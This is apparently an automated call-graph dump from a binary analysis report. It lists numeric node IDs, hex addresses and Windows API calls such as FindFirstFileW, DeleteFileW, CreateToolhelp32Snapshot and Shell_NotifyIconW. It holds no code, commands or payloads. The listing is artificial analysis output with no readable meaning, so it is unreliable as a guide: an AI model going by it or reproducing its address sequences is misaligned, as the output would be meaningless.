97834->97850 97836->97818 97839 6effc9 97841 6effcd Mailbox 97839->97841 97860 6b523c 59 API calls 97839->97860 97841->97818 97842->97820 97843->97829 97844->97829 97846 6d0fe6 Mailbox 59 API calls 97845->97846 97847 6c1652 97846->97847 97848 6d0fe6 Mailbox 59 API calls 97847->97848 97849 6c1660 97848->97849 97849->97832 97851 6ff401 97850->97851 97852 6c17f2 97850->97852 97867 7087f9 59 API calls _memmove 97851->97867 97861 6c1680 97852->97861 97855 6c17fe 97859 6b3938 68 API calls 97855->97859 97856 6ff40b 97857 6c1c9c 59 API calls 97856->97857 97858 6ff413 Mailbox 97857->97858 97859->97839 97860->97841 97862 6c1692 97861->97862 97866 6c16ba _memmove 97861->97866 97863 6d0fe6 Mailbox 59 API calls 97862->97863 97862->97866 97865 6c176f _memmove 97863->97865 97864 6d0fe6 Mailbox 59 API calls 97864->97865 97865->97864 97866->97855 97867->97856 97868 6b1066 97873 6baaaa 97868->97873 97870 6b106c 97871 6d2f70 __cinit 67 API calls 97870->97871 97872 6b1076 97871->97872 97874 6baacb 97873->97874 97906 6d02eb 97874->97906 97878 6bab12 97916 6c1207 97878->97916 97881 6c1207 59 API calls 97882 6bab26 97881->97882 97883 6c1207 59 API calls 97882->97883 97884 6bab30 97883->97884 97885 6c1207 59 API calls 97884->97885 97886 6bab6e 97885->97886 97887 6c1207 59 API calls 97886->97887 97888 6bac39 97887->97888 97921 6d0588 97888->97921 97892 6bac6b 97893 6c1207 59 API calls 97892->97893 97894 6bac75 97893->97894 97949 6cfe2b 97894->97949 97896 6bacbc 97897 6baccc GetStdHandle 97896->97897 97898 6bad18 97897->97898 97899 6f2f39 97897->97899 97900 6bad20 OleInitialize 97898->97900 97899->97898 97901 6f2f42 97899->97901 97900->97870 97956 7170f3 64 API calls Mailbox 97901->97956 97903 6f2f49 97957 7177c2 CreateThread 97903->97957 97905 6f2f55 CloseHandle 97905->97900 97958 6d03c4 97906->97958 97909 6d03c4 59 API calls 97910 6d032d 97909->97910 97911 6c1207 59 API calls 97910->97911 97912 6d0339 97911->97912 97965 6c1821 97912->97965 97914 6baad1 97915 6d07bb 6 API calls 97914->97915 97915->97878 97917 6d0fe6 Mailbox 59 API calls 97916->97917 97918 6c1228 97917->97918 97919 6d0fe6 Mailbox 59 API calls 97918->97919 97920 6bab1c 97919->97920 97920->97881 97922 6c1207 59 API calls 97921->97922 97923 6d0598 97922->97923 97924 6c1207 59 API calls 97923->97924 97925 6d05a0 97924->97925 97989 6c10c3 97925->97989 97928 6c10c3 59 API calls 97929 6d05b0 97928->97929 97930 6c1207 59 API calls 97929->97930 97931 6d05bb 97930->97931 97932 6d0fe6 Mailbox 59 API calls 97931->97932 97933 6bac43 97932->97933 97934 6cff4c 97933->97934 97935 6cff5a 97934->97935 97936 6c1207 59 API calls 97935->97936 97937 6cff65 97936->97937 97938 6c1207 59 API calls 97937->97938 97939 6cff70 97938->97939 97940 6c1207 59 API calls 97939->97940 97941 6cff7b 97940->97941 97942 6c1207 59 API calls 97941->97942 97943 6cff86 97942->97943 97944 6c10c3 59 API calls 97943->97944 97945 6cff91 97944->97945 97946 6d0fe6 Mailbox 59 API calls 97945->97946 97947 6cff98 RegisterWindowMessageW 97946->97947 97947->97892 97950 6cfe3b 97949->97950 97951 70620c 97949->97951 97953 6d0fe6 Mailbox 59 API calls 97950->97953 97992 71a12a 59 API calls 97951->97992 97955 6cfe43 97953->97955 97954 706217 97955->97896 97956->97903 97957->97905 97993 7177a8 65 API calls 97957->97993 97959 6c1207 59 API calls 97958->97959 97960 6d03cf 97959->97960 97961 6c1207 59 API calls 97960->97961 97962 6d03d7 97961->97962 97963 6c1207 59 API calls 97962->97963 97964 6d0323 97963->97964 97964->97909 97966 6c182d __wsetenvp 97965->97966 97967 6c189a 97965->97967 97969 6c1868 97966->97969 97970 6c1843 97966->97970 97981 6c1981 97967->97981 97978 6c1c7e 97969->97978 97974 6c1b7c 97970->97974 97973 6c184b _memmove 97973->97914 97975 6c1b8e 97974->97975 97976 6c1b94 97974->97976 97975->97973 97977 6d0fe6 Mailbox 59 API calls 97976->97977 97977->97975 97979 6d0fe6 Mailbox 59 API calls 97978->97979 97980 6c1c88 97979->97980 97980->97973 97982 6c198f 97981->97982 97983 6c1998 _memmove 97981->97983 97982->97983 97985 6c1aa4 97982->97985 97983->97973 97986 6c1ab7 97985->97986 97988 6c1ab4 _memmove 97985->97988 97987 6d0fe6 Mailbox 59 API calls 97986->97987 97987->97988 97988->97983 97990 6c1207 59 API calls 97989->97990 97991 6c10cb 97990->97991 97991->97928 97992->97954 97994 6ee463 97995 6b373a 59 API calls 97994->97995 97996 6ee479 97995->97996 97997 6ee48f 97996->97997 97998 6ee4fa 97996->97998 98048 6b5376 60 API calls 97997->98048 98006 6bb020 97998->98006 98000 6ee4ce 98005 6ee4ee Mailbox 98000->98005 98049 71890a 59 API calls Mailbox 98000->98049 98003 6ef046 Mailbox 98005->98003 98050 71a48d 89 API calls 4 library calls 98005->98050 98051 6c3740 98006->98051 98009 6f30b6 98150 71a48d 89 API calls 4 library calls 98009->98150 98010 6bb07f 98010->98009 98012 6f30d4 98010->98012 98028 6bbb86 98010->98028 98029 6bb132 Mailbox _memmove 98010->98029 98151 71a48d 89 API calls 4 library calls 98012->98151 98014 6f355e 98047 6bb4dd 98014->98047 98162 71a48d 89 API calls 4 library calls 98014->98162 98015 70730a 59 API calls 98015->98029 98016 6f318a 98016->98047 98153 71a48d 89 API calls 4 library calls 98016->98153 98021 6f3106 98021->98016 98152 6ba9de 291 API calls 98021->98152 98024 6b53b0 291 API calls 98024->98029 98025 6b3b31 59 API calls 98025->98029 98149 71a48d 89 API calls 4 library calls 98028->98149 98029->98014 98029->98015 98029->98021 98029->98024 98029->98025 98029->98028 98035 6f31c3 98029->98035 98036 6b3c30 68 API calls 98029->98036 98038 6f346f 98029->98038 98041 6b523c 59 API calls 98029->98041 98043 6c1c9c 59 API calls 98029->98043 98044 6f3418 98029->98044 98045 6d0fe6 59 API calls Mailbox 98029->98045 98029->98047 98056 6b3add 98029->98056 98063 6bbc70 98029->98063 98143 6b3a40 59 API calls Mailbox 98029->98143 98144 6b5190 98029->98144 98155 706c62 59 API calls 2 library calls 98029->98155 98156 72a9c3 85 API calls Mailbox 98029->98156 98157 706c1e 59 API calls Mailbox 98029->98157 98158 715ef2 68 API calls 98029->98158 98159 6b3ea3 68 API calls Mailbox 98029->98159 98161 71a12a 59 API calls 98029->98161 98030 6b53b0 291 API calls 98032 6f3448 98030->98032 98037 6b39be 68 API calls 98032->98037 98032->98047 98154 71a48d 89 API calls 4 library calls 98035->98154 98036->98029 98037->98038 98160 71a48d 89 API calls 4 library calls 98038->98160 98041->98029 98043->98029 98044->98030 98045->98029 98047->98005 98048->98000 98049->98005 98050->98003 98052 6c374f 98051->98052 98055 6c376a 98051->98055 98053 6c1aa4 59 API calls 98052->98053 98054 6c3757 CharUpperBuffW 98053->98054 98054->98055 98055->98010 98057 6ed3cd 98056->98057 98058 6b3aee 98056->98058 98059 6d0fe6 Mailbox 59 API calls 98058->98059 98060 6b3af5 98059->98060 98061 6b3b16 98060->98061 98163 6b3ba5 59 API calls Mailbox 98060->98163 98061->98029 98064 6f359f 98063->98064 98075 6bbc95 98063->98075 98267 71a48d 89 API calls 4 library calls 98064->98267 98066 6bbf3b 98066->98029 98070 6bc2b6 98070->98066 98071 6bc2c3 98070->98071 98265 6bc483 291 API calls Mailbox 98071->98265 98074 6bc2ca LockWindowUpdate DestroyWindow GetMessageW 98074->98066 98076 6bc2fc 98074->98076 98136 6bbca5 Mailbox 98075->98136 98268 6b5376 60 API calls 98075->98268 98269 70700c 291 API calls 98075->98269 98078 6f4509 TranslateMessage DispatchMessageW GetMessageW 98076->98078 98077 6f36b3 Sleep 98077->98136 98078->98078 98079 6f4539 98078->98079 98079->98066 98080 6d0fe6 59 API calls Mailbox 98080->98136 98081 6bbf54 timeGetTime 98081->98136 98083 6f405d WaitForSingleObject 98084 6f407d GetExitCodeProcess CloseHandle 98083->98084 98083->98136 98089 6bc36b 98084->98089 98085 6c1c9c 59 API calls 98085->98136 98086 6c1207 59 API calls 98117 6bc1fa Mailbox 98086->98117 98087 6bc210 Sleep 98087->98117 98088 6f43a9 Sleep 98088->98117 98089->98029 98092 6d083e timeGetTime 98092->98117 98093 6bc324 timeGetTime 98266 6b5376 60 API calls 98093->98266 98096 6f4440 GetExitCodeProcess 98100 6f446c CloseHandle 98096->98100 98101 6f4456 WaitForSingleObject 98096->98101 98098 6b6d79 109 API calls 98098->98136 98100->98117 98101->98100 98101->98136 98102 736562 110 API calls 98102->98117 98104 6b5376 60 API calls 98104->98136 98105 6f38aa Sleep 98105->98136 98106 6f44c8 Sleep 98106->98136 98107 6c1a36 59 API calls 98107->98117 98113 6b53b0 269 API calls 98113->98136 98114 6bc26d 98120 6c1a36 59 API calls 98114->98120 98115 6bb020 269 API calls 98115->98136 98117->98086 98117->98087 98117->98089 98117->98092 98117->98096 98117->98102 98117->98105 98117->98106 98117->98107 98117->98136 98294 712baf 60 API calls 98117->98294 98295 6b5376 60 API calls 98117->98295 98296 6b3ea3 68 API calls Mailbox 98117->98296 98297 6b6cd8 291 API calls 98117->98297 98299 7070e2 59 API calls 98117->98299 98300 7157ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98117->98300 98301 714148 CreateToolhelp32Snapshot Process32FirstW 98117->98301 98118 6c1a36 59 API calls 98118->98136 98121 6bbf25 Mailbox 98120->98121 98121->98066 98264 6bc460 10 API calls Mailbox 98121->98264 98124 6b39be 68 API calls 98124->98136 98126 706cf1 59 API calls Mailbox 98126->98136 98127 6b6cd8 269 API calls 98127->98136 98129 71a48d 89 API calls 98129->98136 98130 6f3e13 VariantClear 98130->98136 98131 6f3ea9 VariantClear 98131->98136 98132 6f3c57 VariantClear 98132->98136 98133 6b41c4 59 API calls Mailbox 98133->98136 98134 707aad 59 API calls 98134->98136 98135 6b3ea3 68 API calls 98135->98136 98136->98077 98136->98080 98136->98081 98136->98083 98136->98085 98136->98087 98136->98088 98136->98089 98136->98093 98136->98098 98136->98104 98136->98113 98136->98114 98136->98115 98136->98117 98136->98118 98136->98121 98136->98124 98136->98126 98136->98127 98136->98129 98136->98130 98136->98131 98136->98132 98136->98133 98136->98134 98136->98135 98137 6b5190 59 API calls Mailbox 98136->98137 98164 6b52b0 98136->98164 98173 6b9a00 98136->98173 98180 6b9c80 98136->98180 98211 6ba820 98136->98211 98228 71c270 98136->98228 98235 71e4a0 98136->98235 98238 6bcfd7 98136->98238 98257 6c42cf 98136->98257 98261 72e60c 98136->98261 98270 736655 59 API calls 98136->98270 98271 71a058 59 API calls Mailbox 98136->98271 98272 70e0aa 59 API calls 98136->98272 98273 6b4d37 98136->98273 98291 706c62 59 API calls 2 library calls 98136->98291 98292 6b38ff 59 API calls 98136->98292 98293 6b3a40 59 API calls Mailbox 98136->98293 98298 72c355 291 API calls Mailbox 98136->98298 98137->98136 98143->98029 98146 6b519b 98144->98146 98145 6b51d2 98145->98029 98146->98145 98895 6b41c4 59 API calls Mailbox 98146->98895 98148 6b51fd 98148->98029 98149->98009 98150->98047 98151->98047 98152->98016 98153->98047 98154->98047 98155->98029 98156->98029 98157->98029 98158->98029 98159->98029 98160->98047 98161->98029 98162->98047 98163->98061 98165 6b52c6 98164->98165 98172 6b5313 98164->98172 98166 6b52d3 PeekMessageW 98165->98166 98165->98172 98167 6b52ec 98166->98167 98166->98172 98167->98136 98169 6edf68 TranslateAcceleratorW 98170 6b533e PeekMessageW 98169->98170 98169->98172 98170->98167 98170->98172 98171 6b5352 TranslateMessage DispatchMessageW 98171->98170 98172->98167 98172->98169 98172->98170 98172->98171 98311 6b359e 98172->98311 98174 6b9a1d 98173->98174 98175 6b9a31 98173->98175 98316 6b94e0 98174->98316 98350 71a48d 89 API calls 4 library calls 98175->98350 98178 6b9a28 98178->98136 98179 6f2478 98179->98179 98181 6b9cb5 98180->98181 98182 6f247d 98181->98182 98185 6b9d1f 98181->98185 98195 6b9d79 98181->98195 98183 6b53b0 291 API calls 98182->98183 98184 6f2492 98183->98184 98205 6b9f50 Mailbox 98184->98205 98358 71a48d 89 API calls 4 library calls 98184->98358 98188 6c1207 59 API calls 98185->98188 98185->98195 98186 6c1207 59 API calls 98186->98195 98189 6f24d8 98188->98189 98191 6d2f70 __cinit 67 API calls 98189->98191 98190 6d2f70 __cinit 67 API calls 98190->98195 98191->98195 98192 6f24fa 98192->98136 98193 71a48d 89 API calls 98193->98205 98194 6b39be 68 API calls 98194->98205 98195->98186 98195->98190 98195->98192 98197 6b9f3a 98195->98197 98195->98205 98197->98205 98359 71a48d 89 API calls 4 library calls 98197->98359 98198 6b4230 59 API calls 98198->98205 98201 6ba775 98363 71a48d 89 API calls 4 library calls 98201->98363 98202 6b5190 Mailbox 59 API calls 98202->98205 98203 6b53b0 291 API calls 98203->98205 98204 6f27f9 98204->98136 98205->98193 98205->98194 98205->98198 98205->98201 98205->98202 98205->98203 98208 6c1bcc 59 API calls 98205->98208 98210 6ba058 98205->98210 98360 707aad 59 API calls 98205->98360 98361 72ccac 291 API calls 98205->98361 98362 72bc26 291 API calls Mailbox 98205->98362 98364 729ab0 291 API calls Mailbox 98205->98364 98208->98205 98210->98136 98212 6f2d51 98211->98212 98215 6ba84c 98211->98215 98366 71a48d 89 API calls 4 library calls 98212->98366 98214 6f2d62 98214->98136 98216 6f2d6a 98215->98216 98224 6ba888 _memmove 98215->98224 98367 71a48d 89 API calls 4 library calls 98216->98367 98219 6d0fe6 59 API calls Mailbox 98219->98224 98220 6f2dae 98368 6ba9de 291 API calls 98220->98368 98221 6b53b0 291 API calls 98221->98224 98223 6f2dc8 98225 6ba975 98223->98225 98369 71a48d 89 API calls 4 library calls 98223->98369 98224->98219 98224->98220 98224->98221 98224->98223 98224->98225 98226 6ba962 98224->98226 98225->98136 98226->98225 98365 72a9c3 85 API calls Mailbox 98226->98365 98229 6b4d37 84 API calls 98228->98229 98230 71c286 98229->98230 98370 714005 98230->98370 98232 71c28e 98233 71c292 GetLastError 98232->98233 98234 71c2a7 98232->98234 98233->98234 98234->98136 98497 71f87d 98235->98497 98237 71e4b0 98237->98136 98239 6b4d37 84 API calls 98238->98239 98240 6bd001 98239->98240 98241 6b5278 59 API calls 98240->98241 98243 6bd018 98241->98243 98242 6bd57b 98242->98136 98243->98242 98251 6bd439 Mailbox __wsetenvp 98243->98251 98722 6b502b 98243->98722 98246 6d0c65 62 API calls 98246->98251 98247 6c162d 59 API calls 98247->98251 98248 6b4f98 59 API calls 98248->98251 98251->98242 98251->98246 98251->98247 98251->98248 98252 6b502b 59 API calls 98251->98252 98253 6b4d37 84 API calls 98251->98253 98254 6c1821 59 API calls 98251->98254 98697 6d312d 98251->98697 98707 6c59d3 98251->98707 98718 6c5ac3 98251->98718 98726 6c153b 59 API calls 2 library calls 98251->98726 98727 6b4f3c 98251->98727 98252->98251 98253->98251 98254->98251 98258 6c42e8 98257->98258 98259 6c42d9 98257->98259 98258->98259 98260 6c42ed CloseHandle 98258->98260 98259->98136 98260->98259 98774 72d1c6 98261->98774 98263 72e61c 98263->98136 98264->98070 98265->98074 98266->98136 98267->98075 98268->98075 98269->98075 98270->98136 98271->98136 98272->98136 98274 6b4d4b 98273->98274 98275 6b4d51 98273->98275 98274->98136 98276 6edb28 __i64tow 98275->98276 98277 6b4d99 98275->98277 98278 6b4d57 __itow 98275->98278 98282 6eda2f 98275->98282 98884 6d38c8 83 API calls 3 library calls 98277->98884 98280 6d0fe6 Mailbox 59 API calls 98278->98280 98283 6b4d71 98280->98283 98284 6d0fe6 Mailbox 59 API calls 98282->98284 98286 6edaa7 Mailbox _wcscpy 98282->98286 98283->98274 98285 6c1a36 59 API calls 98283->98285 98287 6eda74 98284->98287 98285->98274 98885 6d38c8 83 API calls 3 library calls 98286->98885 98288 6d0fe6 Mailbox 59 API calls 98287->98288 98289 6eda9a 98288->98289 98289->98286 98290 6c1a36 59 API calls 98289->98290 98290->98286 98291->98136 98292->98136 98293->98136 98294->98117 98295->98117 98296->98117 98297->98117 98298->98136 98299->98117 98300->98117 98886 714ce2 98301->98886 98303 714195 Process32NextW 98304 714244 CloseHandle 98303->98304 98308 71418e Mailbox 98303->98308 98304->98117 98305 6c1207 59 API calls 98305->98308 98306 6c1a36 59 API calls 98306->98308 98307 6d0119 59 API calls 98307->98308 98308->98303 98308->98304 98308->98305 98308->98306 98308->98307 98309 6c17e0 59 API calls 98308->98309 98892 6c151f 61 API calls 98308->98892 98309->98308 98312 6b35e2 98311->98312 98313 6b35b0 98311->98313 98312->98172 98313->98312 98314 6b35d5 IsDialogMessageW 98313->98314 98315 6ed273 GetClassLongW 98313->98315 98314->98312 98314->98313 98315->98313 98315->98314 98317 6b53b0 291 API calls 98316->98317 98318 6b951f 98317->98318 98319 6f2001 98318->98319 98333 6b9527 _memmove 98318->98333 98320 6b5190 Mailbox 59 API calls 98319->98320 98325 6b9944 98320->98325 98321 6f22c0 98357 71a48d 89 API calls 4 library calls 98321->98357 98323 6f22de 98323->98323 98324 6b9583 98324->98178 98327 6d0fe6 Mailbox 59 API calls 98325->98327 98326 6b986a 98328 6b987f 98326->98328 98329 6f22b1 98326->98329 98340 6b96e3 _memmove 98327->98340 98331 6d0fe6 Mailbox 59 API calls 98328->98331 98356 72a983 59 API calls 98329->98356 98343 6b977d 98331->98343 98332 6d0fe6 59 API calls Mailbox 98332->98333 98333->98321 98333->98324 98333->98325 98333->98332 98334 6b96cf 98333->98334 98349 6b9741 98333->98349 98334->98325 98336 6b96dc 98334->98336 98335 6d0fe6 Mailbox 59 API calls 98338 6b970e 98335->98338 98337 6d0fe6 Mailbox 59 API calls 98336->98337 98337->98340 98338->98349 98351 6bcca0 291 API calls 98338->98351 98339 6f22a0 98355 71a48d 89 API calls 4 library calls 98339->98355 98340->98335 98340->98338 98340->98349 98343->98178 98345 6f2278 98354 71a48d 89 API calls 4 library calls 98345->98354 98347 6f2253 98353 71a48d 89 API calls 4 library calls 98347->98353 98349->98326 98349->98339 98349->98343 98349->98345 98349->98347 98352 6b8180 291 API calls 98349->98352 98350->98179 98351->98349 98352->98349 98353->98343 98354->98343 98355->98343 98356->98321 98357->98323 98358->98205 98359->98205 98360->98205 98361->98205 98362->98205 98363->98204 98364->98205 98365->98225 98366->98214 98367->98225 98368->98223 98369->98225 98371 6c1207 59 API calls 98370->98371 98372 714024 98371->98372 98373 6c1207 59 API calls 98372->98373 98374 71402d 98373->98374 98375 6c1207 59 API calls 98374->98375 98376 714036 98375->98376 98395 6d0284 98376->98395 98381 71405c 98407 6d0119 98381->98407 98384 714070 FindFirstFileW 98385 7140fc FindClose 98384->98385 98386 71408f 98384->98386 98391 714107 Mailbox 98385->98391 98386->98385 98389 714093 98386->98389 98387 7140d7 FindNextFileW 98387->98386 98387->98389 98388 6c1c9c 59 API calls 98388->98389 98389->98386 98389->98387 98389->98388 98390 6c17e0 59 API calls 98389->98390 98392 6c1900 59 API calls 98389->98392 98390->98389 98391->98232 98393 7140c8 DeleteFileW 98392->98393 98393->98387 98394 7140f3 FindClose 98393->98394 98394->98391 98465 6e1b70 98395->98465 98398 6d02cd 98471 6c19e1 98398->98471 98399 6d02b0 98400 6c1821 59 API calls 98399->98400 98402 6d02bc 98400->98402 98467 6c133d 98402->98467 98405 714fec GetFileAttributesW 98406 71404a 98405->98406 98406->98381 98458 6c1900 98406->98458 98408 6c1207 59 API calls 98407->98408 98409 6d012f 98408->98409 98410 6c1207 59 API calls 98409->98410 98411 6d0137 98410->98411 98412 6c1207 59 API calls 98411->98412 98413 6d013f 98412->98413 98414 6c1207 59 API calls 98413->98414 98415 6d0147 98414->98415 98416 6d017b 98415->98416 98417 70627d 98415->98417 98418 6c1462 59 API calls 98416->98418 98419 6c1c9c 59 API calls 98417->98419 98420 6d0189 98418->98420 98421 706286 98419->98421 98422 6c1981 59 API calls 98420->98422 98423 6c19e1 59 API calls 98421->98423 98424 6d0193 98422->98424 98426 6d01be 98423->98426 98425 6c1462 59 API calls 98424->98425 98424->98426 98429 6d01b4 98425->98429 98427 6d01fe 98426->98427 98430 6d01dd 98426->98430 98443 7062a6 98426->98443 98475 6c1462 98427->98475 98432 6c1981 59 API calls 98429->98432 98488 6c1609 98430->98488 98431 6d020f 98435 6d0221 98431->98435 98438 6c1c9c 59 API calls 98431->98438 98432->98426 98433 706376 98436 6c1821 59 API calls 98433->98436 98439 6d0231 98435->98439 98440 6c1c9c 59 API calls 98435->98440 98453 706333 98436->98453 98438->98435 98442 6c1c9c 59 API calls 98439->98442 98444 6d0238 98439->98444 98440->98439 98441 6c1462 59 API calls 98441->98427 98442->98444 98443->98433 98445 70635f 98443->98445 98451 7062dd 98443->98451 98446 6c1c9c 59 API calls 98444->98446 98455 6d023f Mailbox 98444->98455 98445->98433 98447 70634a 98445->98447 98446->98455 98449 6c1821 59 API calls 98447->98449 98448 70633b 98450 6c1821 59 API calls 98448->98450 98449->98453 98450->98453 98451->98448 98456 706326 98451->98456 98452 6c1609 59 API calls 98452->98453 98453->98427 98453->98452 98491 6c153b 59 API calls 2 library calls 98453->98491 98455->98384 98457 6c1821 59 API calls 98456->98457 98457->98453 98459 6c1914 98458->98459 98460 6ff534 98458->98460 98492 6c18a5 98459->98492 98462 6c1c7e 59 API calls 98460->98462 98464 6ff53f __wsetenvp _memmove 98462->98464 98463 6c191f 98463->98381 98466 6d0291 GetFullPathNameW 98465->98466 98466->98398 98466->98399 98468 6c134b 98467->98468 98469 6c1981 59 API calls 98468->98469 98470 6c135b 98469->98470 98470->98405 98472 6c19fb 98471->98472 98474 6c19ee 98471->98474 98473 6d0fe6 Mailbox 59 API calls 98472->98473 98473->98474 98474->98402 98476 6c14ce 98475->98476 98477 6c1471 98475->98477 98478 6c1981 59 API calls 98476->98478 98477->98476 98479 6c147c 98477->98479 98480 6c14d9 98478->98480 98479->98480 98482 6c1497 98479->98482 98481 6c1c7e 59 API calls 98480->98481 98485 6c149f _memmove 98480->98485 98483 6ff1e8 98481->98483 98484 6c1b7c 59 API calls 98482->98484 98486 6d0fe6 Mailbox 59 API calls 98483->98486 98484->98485 98485->98431 98487 6ff208 98486->98487 98487->98431 98489 6c1aa4 59 API calls 98488->98489 98490 6c1614 98489->98490 98490->98427 98490->98441 98491->98453 98493 6c18b4 __wsetenvp 98492->98493 98494 6c1c7e 59 API calls 98493->98494 98495 6c18c5 _memmove 98493->98495 98496 6ff4f1 _memmove 98494->98496 98495->98463 98498 71f8f2 98497->98498 98499 71f898 98497->98499 98581 71fbb7 59 API calls 98498->98581 98501 6d0fe6 Mailbox 59 API calls 98499->98501 98502 71f89f 98501->98502 98503 71f8ab 98502->98503 98560 6c3df7 98502->98560 98505 6b4d37 84 API calls 98503->98505 98510 71f8bd 98505->98510 98506 71f8ff 98507 71f9cb 98506->98507 98508 71f8d9 98506->98508 98514 71f93f 98506->98514 98553 718cd0 98507->98553 98508->98237 98569 6c3e47 98510->98569 98511 71f9d2 98557 71394d 98511->98557 98516 6b4d37 84 API calls 98514->98516 98515 71f8cd 98515->98508 98580 6c3f0b CloseHandle 98515->98580 98525 71f946 98516->98525 98519 71f9c1 98534 71399c 98519->98534 98521 71f97a 98522 6c162d 59 API calls 98521->98522 98524 71f98a 98522->98524 98523 6c42cf CloseHandle 98526 71fa20 98523->98526 98527 6c1c9c 59 API calls 98524->98527 98525->98519 98525->98521 98526->98508 98582 6c3f0b CloseHandle 98526->98582 98528 71f994 98527->98528 98530 6c1900 59 API calls 98528->98530 98531 71f9a2 98530->98531 98532 71399c 66 API calls 98531->98532 98533 71f9ae Mailbox 98532->98533 98533->98508 98533->98523 98535 713a15 98534->98535 98536 7139af 98534->98536 98538 71394d 3 API calls 98535->98538 98536->98535 98537 7139b4 98536->98537 98539 713a09 98537->98539 98540 7139be 98537->98540 98552 7139fd Mailbox 98538->98552 98607 713a35 62 API calls Mailbox 98539->98607 98542 7139de 98540->98542 98543 7139c8 98540->98543 98583 6c40cd 98542->98583 98545 6c40cd 59 API calls 98543->98545 98547 7139d0 98545->98547 98599 6c402a WideCharToMultiByte 98547->98599 98550 7139dc 98596 71397e 98550->98596 98552->98533 98554 718cd9 98553->98554 98555 718cde 98553->98555 98633 717d6e 61 API calls 2 library calls 98554->98633 98555->98511 98634 71384c 98557->98634 98559 713959 WriteFile 98559->98533 98561 6d0fe6 Mailbox 59 API calls 98560->98561 98562 6c3e07 98561->98562 98563 6c42cf CloseHandle 98562->98563 98564 6c3e12 98563->98564 98565 6c1207 59 API calls 98564->98565 98566 6c3e1a 98565->98566 98567 6c42cf CloseHandle 98566->98567 98568 6c3e21 98567->98568 98568->98503 98570 6c42cf CloseHandle 98569->98570 98571 6c3e53 98570->98571 98643 6c42f9 98571->98643 98573 6c3e95 98573->98506 98573->98515 98574 6c3e72 98574->98573 98651 6c3c61 98574->98651 98576 6c3e84 98668 6c389f 98576->98668 98579 71394d 3 API calls 98579->98573 98580->98508 98581->98506 98582->98508 98584 6d0fe6 Mailbox 59 API calls 98583->98584 98585 6c40e0 98584->98585 98586 6c1c7e 59 API calls 98585->98586 98587 6c40ed 98586->98587 98588 7138e0 WideCharToMultiByte 98587->98588 98589 713912 98588->98589 98590 713908 98588->98590 98592 6d0fe6 Mailbox 59 API calls 98589->98592 98621 6c3f20 98590->98621 98593 713919 WideCharToMultiByte 98592->98593 98608 6c3f79 98593->98608 98595 713910 98595->98550 98597 71394d 3 API calls 98596->98597 98598 713990 98597->98598 98598->98552 98600 6c404e 98599->98600 98601 6c4085 98599->98601 98602 6d0fe6 Mailbox 59 API calls 98600->98602 98603 6c3f20 59 API calls 98601->98603 98604 6c4055 WideCharToMultiByte 98602->98604 98605 6c4077 98603->98605 98606 6c3f79 59 API calls 98604->98606 98605->98550 98606->98605 98607->98552 98609 6c3fc5 98608->98609 98610 6c3f87 98608->98610 98632 7136bf 59 API calls _memmove 98609->98632 98610->98609 98612 6c3f92 98610->98612 98613 6c3fa0 98612->98613 98614 7005fe 98612->98614 98628 6c3f3c 98613->98628 98616 6c1c7e 59 API calls 98614->98616 98618 700608 98616->98618 98617 6c3fa8 _memmove 98617->98595 98619 6d0fe6 Mailbox 59 API calls 98618->98619 98620 70061a 98619->98620 98622 7005e0 98621->98622 98623 6c3f31 98621->98623 98624 6c1c7e 59 API calls 98622->98624 98623->98595 98625 7005ea 98624->98625 98626 6d0fe6 Mailbox 59 API calls 98625->98626 98627 7005f6 98626->98627 98629 6c3f4e 98628->98629 98631 6c3f6c 98628->98631 98630 6d0fe6 Mailbox 59 API calls 98629->98630 98630->98631 98631->98617 98632->98617 98633->98555 98635 71385e 98634->98635 98636 713853 98634->98636 98635->98559 98641 6c42ae SetFilePointerEx 98636->98641 98638 7138b8 SetFilePointerEx 98642 6c42ae SetFilePointerEx 98638->98642 98640 7138d7 98640->98559 98641->98638 98642->98640 98644 7006fc 98643->98644 98645 6c4312 CreateFileW 98643->98645 98646 700702 CreateFileW 98644->98646 98648 6c4334 98644->98648 98645->98648 98647 700728 98646->98647 98646->98648 98672 6c410a 98647->98672 98648->98574 98652 6c3c7c 98651->98652 98653 700549 98651->98653 98654 6c410a 2 API calls 98652->98654 98667 6c3d0b 98652->98667 98653->98667 98691 6c41d6 98653->98691 98655 6c3c9e 98654->98655 98682 6c433f 98655->98682 98659 6c3cb5 98660 6d0fe6 Mailbox 59 API calls 98659->98660 98661 6c3cc0 98660->98661 98662 6c433f 59 API calls 98661->98662 98663 6c3ccb 98662->98663 98685 6c4220 98663->98685 98666 6c410a 2 API calls 98666->98667 98667->98576 98669 6c38a8 98668->98669 98670 6c38b5 98668->98670 98671 6c410a 2 API calls 98669->98671 98670->98573 98670->98579 98671->98670 98678 6c4124 98672->98678 98673 6c41ab SetFilePointerEx 98680 6c42ae SetFilePointerEx 98673->98680 98674 7006cc 98681 6c42ae SetFilePointerEx 98674->98681 98677 7006e6 98678->98673 98678->98674 98679 6c417f 98678->98679 98679->98648 98680->98679 98681->98677 98683 6d0fe6 Mailbox 59 API calls 98682->98683 98684 6c3ca8 98683->98684 98684->98653 98684->98659 98686 6c4293 98685->98686 98690 6c422e 98685->98690 98696 6c42ae SetFilePointerEx 98686->98696 98688 6c3cf8 98688->98666 98689 6c4266 ReadFile 98689->98688 98689->98690 98690->98688 98690->98689 98692 6c410a 2 API calls 98691->98692 98693 6c41f7 98692->98693 98694 6c410a 2 API calls 98693->98694 98695 6c420b 98694->98695 98695->98667 98696->98690 98698 6d31ae 98697->98698 98699 6d3139 98697->98699 98735 6d31c0 60 API calls 3 library calls 98698->98735 98703 6d315e 98699->98703 98733 6d8d58 58 API calls __getptd_noexit 98699->98733 98702 6d31bb 98702->98251 98703->98251 98704 6d3145 98734 6d8fe6 9 API calls wcstoxq 98704->98734 98706 6d3150 98706->98251 98708 6c59fe _memset 98707->98708 98736 6c5800 98708->98736 98711 6c5a83 98713 6c5a9d Shell_NotifyIconW 98711->98713 98714 6c5ab9 Shell_NotifyIconW 98711->98714 98715 6c5aab 98713->98715 98714->98715 98740 6c56f8 98715->98740 98717 6c5ab2 98717->98251 98719 6c5b25 98718->98719 98720 6c5ad5 _memset 98718->98720 98719->98251 98721 6c5af4 Shell_NotifyIconW 98720->98721 98721->98719 98723 6b5041 98722->98723 98724 6b503c 98722->98724 98723->98251 98724->98723 98773 6d37ba 59 API calls 98724->98773 98726->98251 98728 6b4f48 98727->98728 98729 6b4f87 98727->98729 98731 6d0fe6 Mailbox 59 API calls 98728->98731 98730 6c1c9c 59 API calls 98729->98730 98732 6b4f5b 98730->98732 98731->98732 98732->98251 98733->98704 98734->98706 98735->98702 